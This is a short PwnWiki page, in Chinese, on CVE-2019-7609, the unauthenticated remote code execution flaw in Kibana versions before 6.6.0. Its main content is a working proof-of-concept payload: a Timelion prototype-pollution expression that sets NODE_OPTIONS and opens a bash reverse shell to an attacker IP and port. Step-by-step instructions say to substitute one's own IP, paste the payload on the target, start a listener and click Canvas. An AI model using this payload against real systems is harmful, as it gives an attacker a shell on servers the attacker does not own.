CVE-2019-7609 kibana 未授權遠程代碼執行漏洞

From PwnWiki
Revision as of 14:50, 15 April 2021 by Pwnwiki (talk | contribs) (Created page with "==影響版本== kibana<6.6.0 ==POC== 將POC裡的反鏈IP地址換成自己的,然後在目標機器上的 Timelion 選項下將以下 POC 粘貼進去,點擊 Run 運行...")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

影響版本

kibana<6.6.0

POC

將POC裡的反鏈IP地址換成自己的,然後在目標機器上的 Timelion 選項下將以下 POC 粘貼進去,點擊 Run 運行 

.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/10.10.20.166/8989 0>&1");process.exit()//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')

攻擊機器开启监听,点击 Canvas 即可觸發漏洞。

Retrieved from "https://pwnwiki.com/index.php?title=CVE-2019-7609_kibana_未授權遠程代碼執行漏洞&oldid=1683"